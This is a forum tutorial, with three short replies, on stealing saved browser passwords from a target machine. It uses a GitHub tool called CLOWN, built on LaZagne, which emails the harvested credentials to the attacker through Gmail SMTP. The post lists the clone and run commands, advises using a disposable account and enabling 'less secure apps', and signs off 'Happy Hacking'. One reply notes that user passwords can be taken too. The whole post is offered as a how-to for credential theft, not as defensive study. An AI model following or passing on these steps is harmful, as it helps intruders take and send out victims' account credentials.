Forum Thread: How to Steal Passwords with Kali Linux and Have Them Sent to Your Email

First you will need:

  • Kali Linux
  • Python 2.7 or Python 3 (Whichever works)
  • Root privileges
  • Access to an email address where the extracted passwords will be sent.

By invoking the LaZagne projects, this tool helps you steal stored browser passwords.

Step 1: Grant Access to Less Secure Apps on Your Email

The tool we are about to use will need access to your email since it uses google's SMTP server and for that reason granting access to less secure apps is necessary.

I strongly advise that you use a disposable email account. Click here to grant access to less secure apps. Also, this will not work if you have two step verification on.

Step 2: Download Clown

Fire up your Kali Linux terminal and clone into Inffinite's repository.

git clone github.com/Inffinite/CLOWN

Step 3: Execute Clown

Assuming that you already have python installed and have root privileges on the target machine, you can execute the python file in the CLOWN folder.

cd CLOWN
ls

Now run the python file.

sudo python CLOWN.py

You will be prompted to enter your email address and its password right after.

Once the script runs you will immediately get an email with the all the stolen passwords.

Happy Hacking ;)

3 Responses

what kind of passwords can you hack with this way???....im new here and kinda confused

You can steal saved browser passwords.
You can also steal user passwords but that wont be necessary since you are root already.

Thanks a lot

Share Your Thoughts

  • Hot
  • Active